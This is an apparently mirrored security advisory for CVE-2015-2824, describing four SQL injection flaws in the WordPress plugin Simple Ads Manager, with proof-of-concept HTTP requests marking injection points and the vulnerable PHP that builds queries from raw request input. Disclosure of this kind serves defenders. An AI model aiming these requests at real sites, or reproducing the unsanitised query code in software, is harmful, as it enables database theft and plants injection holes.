Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:32054
HistoryMay 11, 2015 - 12:00 a.m.

Wordpress plugin Simple Ads Manager - SQL Injection

2015-05-1100:00:00
vulners.com
18
JSON

#Vulnerability title: Wordpress plugin Simple Ads Manager - SQL Injection
#Product: Wordpress plugin Simple Ads Manager
#Vendor: https://profiles.wordpress.org/minimus/
#Affected version: Simple Ads Manager 2.5.94 and 2.5.96
#Download link: https://wordpress.org/plugins/simple-ads-manager/
#CVE ID: CVE-2015-2824
#Author: Le Hong Minh ([email protected]) & ITAS Team

::PROOF OF CONCEPT::

—SQL INJECTION 1—

  • REQUEST:

POST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101
Firefox/28.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://target.com/archives/wordpress-plugin-simple-ads-manager/
Content-Length: 270
Cookie: wooTracker=cx5qN1BQ4nmu; _ga=GA1.2.344989027.1425640938;
PHPSESSID=kqvtir87g33e2ujkc290l5bmm7;
cre_datacookie=8405688a-3dec-4d02-9405-68f53281e991; _gat=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

action=sam_hits&hits%5B0%5D%5B%5D=<SQL INJECTION
HERE>&hits%5B1%5D%5B%5D=<SQL INJECTION HERE>&hits%5B2%5D%5B%5D=<SQL
INJECTION HERE>&level=3

  • Vulnerable file: simple-ads-manager/sam-ajax.php

  • Vulnerable code:

    case &#39;sam_ajax_sam_hits&#39;:
    if&#40;isset&#40;$_POST[&#39;hits&#39;]&#41; &amp;&amp; is_array&#40;$_POST[&#39;hits&#39;]&#41;&#41; {
  	  $hits = $_POST[&#39;hits&#39;];
  	  $values = &#39;&#39;;
  	  $remoteAddr = $_SERVER[&#39;REMOTE_ADDR&#39;];
  	  foreach&#40;$hits as $hit&#41; {
  		  $values .= &#40;&#40;empty&#40;$values&#41;&#41; ? &#39;&#39; : &#39;, &#39;&#41;

. "({$hit[1]}, {$hit[0]}, NOW(), 0, \"{$remoteAddr}\")";
}
$sql = "INSERT INTO $sTable (id, pid, event_time,
event_type, remote_addr) VALUES {$values};";
$result = $wpdb->query($sql);
if($result > 0) echo json_encode(array('success'
=> true, 'sql' => $sql, 'addr' => $_SERVER['REMOTE_ADDR']));
else echo json_encode(array(
'success' => false,
'result' => $result,
'sql' => $sql,
'hits' => $hits,
'values' => $values
));
}
break;

—SQL INJECTION 2—
+REQUEST
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: hostname
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

action=load_posts&cstr=<SQL INJECTION HERE>&sp=Post&spg=Page

  • Vulnerable file: simple-ads-manager/sam-ajax-admin.php

  • Vulnerable code:
    case 'sam_ajax_load_posts':
    $custs = (isset($_REQUEST['cstr'])) ? $_REQUEST['cstr'] : '';
    $sPost = (isset($_REQUEST['sp'])) ? urldecode( $_REQUEST['sp'] ) :
    'Post';
    $sPage = (isset($_REQUEST['spg'])) ? urldecode( $_REQUEST['spg'] ) :
    'Page';

    //set @row_num = 0;
//SELECT @row_num := @row_num + 1 AS recid
$sql = &quot;SELECT
          wp.id,
          wp.post_title AS title,
          wp.post_type AS type
        FROM
          $postTable wp
        WHERE
          wp.post_status = &#39;publish&#39; AND
          FIND_IN_SET&#40;wp.post_type, &#39;post,page{$custs}&#39;&#41;
        ORDER BY wp.id;&quot;;

$posts = $wpdb-&gt;get_results&#40;$sql, ARRAY_A&#41;;

$k = 0;
foreach&#40;$posts as &amp;$val&#41; {
  switch&#40;$val[&#39;type&#39;]&#41; {
    case &#39;post&#39;:
      $val[&#39;type&#39;] = $sPost;
      break;
    case &#39;page&#39;:
      $val[&#39;type&#39;] = $sPage;
      break;
    default:
      $val[&#39;type&#39;] = $sPost . &#39;: &#39;.$val[&#39;type&#39;];
      break;
  }
  $k++;
  $val[&#39;recid&#39;] = $k;
}
$out = array&#40;
  &#39;status&#39; =&gt; &#39;success&#39;,
  &#39;total&#39; =&gt; count&#40;$posts&#41;,
  &#39;records&#39; =&gt; $posts
&#41;;
break;

—SQL INJECTION 3—
+REQUEST:

POST
/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?searchTerm=<SQL
INJECTION HERE> HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101
Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6;
__utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
;
wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%
3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3
Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1;
wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5;
wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1;
__utmb=30068390.1.10.1427794022; __utmc=30068390
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

action=load_combo_data

  • Vulnerable file: simple-ads-manager/sam-ajax-admin.php
    +Vulnerable code: from line 225 to 255
    case 'sam_ajax_load_combo_data':
    $page = $_GET['page'];
    $rows = $_GET['rows'];
    $searchTerm = $_GET['searchTerm'];
    $offset = ((int)$page - 1) * (int)$rows;
    $sql = "SELECT
    wu.id,
    wu.display_name AS title,
    wu.user_nicename AS slug,
    wu.user_email AS email
    FROM
    $uTable wu
    WHERE wu.user_nicename LIKE '{$searchTerm}%'
    ORDER BY wu.id
    LIMIT $offset, $rows;";
    $users = $wpdb->get_results($sql, ARRAY_A);
    $sql = "SELECT COUNT(*) FROM $uTable wu WHERE wu.user_nicename LIKE
    '{$searchTerm}%';";
    $rTotal = $wpdb->get_var($sql);
    $total = ceil((int)$rTotal/(int)$rows);
    $out = array(
    'page' => $page,
    'records' => count($users),
    'rows' => $users,
    'total' => $total,
    'offset' => $offset
    );
    break;

—SQL INJECTION 4—

  • REQUEST

POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101
Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6;
__utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
;
wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%
3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3
Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1;
wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5;
wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1;
__utmc=30068390
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 73

action=load_users&subscriber=<SQL INJECTION HERE>&contributor=<SQL INJECTION
HERE>&author=<SQL INJECTION HERE>&editor=<SQL INJECTION HERE>&admin=<SQL
INJECTION HERE>&sadmin=<SQL INJECTION HERE>

  • Vulnerable file: simple-ads-manager/sam-ajax-admin.php

  • Vulnerable code: from line 188 to 223
    case 'sam_ajax_load_users':
    $roleSubscriber = (isset($_REQUEST['subscriber'])) ?
    urldecode($_REQUEST['subscriber']) : 'Subscriber';
    $roleContributor = (isset($_REQUEST['contributor'])) ?
    urldecode($_REQUEST['contributor']) : 'Contributor';
    $roleAuthor = (isset($_REQUEST['author'])) ?
    urldecode($_REQUEST['author']) : 'Author';
    $roleEditor = (isset($_REQUEST['editor'])) ?
    urldecode($_REQUEST['editor']) : 'Editor';
    $roleAdministrator = (isset($_REQUEST["admin"])) ?
    urldecode($_REQUEST["admin"]) : 'Administrator';
    $roleSuperAdmin = (isset($_REQUEST['sadmin'])) ?
    urldecode($_REQUEST['sadmin']) : 'Super Admin';
    $sql = "SELECT
    wu.id,
    wu.display_name AS title,
    wu.user_nicename AS slug,
    (CASE wum.meta_value
    WHEN 0 THEN '$roleSubscriber'
    WHEN 1 THEN '$roleContributor'
    WHEN 2 THEN '$roleAuthor'
    ELSE
    IF(wum.meta_value > 2 AND wum.meta_value <= 7,
    '$roleEditor',
    IF(wum.meta_value > 7 AND wum.meta_value <= 10,
    '$roleAdministrator',
    IF(wum.meta_value > 10, '$roleSuperAdmin', NULL)
    )
    )
    END) AS role
    FROM $uTable wu
    INNER JOIN $umTable wum
    ON wu.id = wum.user_id AND wum.meta_key = '$userLevel'
    ORDER BY wu.id;";
    $users = $wpdb->get_results($sql, ARRAY_A);
    $k = 0;
    foreach($users as &$val) {
    $k++;
    $val['recid'] = $k;
    }
    $out = $users;
    break;

Best Regards

ITAS Team (www.itas.vn)

Related

securityvulns 2
dsquare 1
exploitpack 1
patchstack 1
packetstorm 1
zdt 1
prion 1
cve 1
exploitdb 1
openvas 1
wpvulndb 1
securityvulns
securityvulns
Wordpress plugin Simple Ads Manager - Multiple SQL Injection
2015-05-11 00:00:00
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2015-05-11 00:00:00
dsquare
dsquare
WordPress Simple Ads Manager SQL Injection
2015-05-01 00:00:00
exploitpack
exploitpack
WordPress Plugin Simple Ads Manager - Multiple SQL Injections
2015-04-02 00:00:00
patchstack
patchstack
WordPress Simple Ads Manager Plugin <= 2.7.96 - Multiple SQL Injection
2015-04-01 00:00:00
packetstorm
packetstorm
WordPress Simple Ads Manager 2.5.94 / 2.5.96 SQL Injection
2015-04-03 00:00:00
zdt
zdt
Wordpress Simple Ads Manager Plugin - Multiple SQL Injection Vulnerability
2015-04-02 00:00:00
prion
prion
Sql injection
2015-04-06 15:59:00
cve
cve
CVE-2015-2824
2015-04-06 15:59:00
exploitdb
exploitdb
WordPress Plugin Simple Ads Manager - Multiple SQL Injections
2015-04-02 00:00:00
openvas
openvas
WordPress Simple Ads Manager Plugin Multiple Vulnerabilities
2015-04-14 00:00:00
wpvulndb
wpvulndb
Simple Ads Manager <= 2.5.94 - Arbitrary File Upload & SQL Injection
2015-04-02 00:00:00
JSON
Related for SECURITYVULNS:DOC:32054
securityvulns2dsquare1exploitpack1patchstack1packetstorm1zdt1prion1cve1exploitdb1openvas1wpvulndb1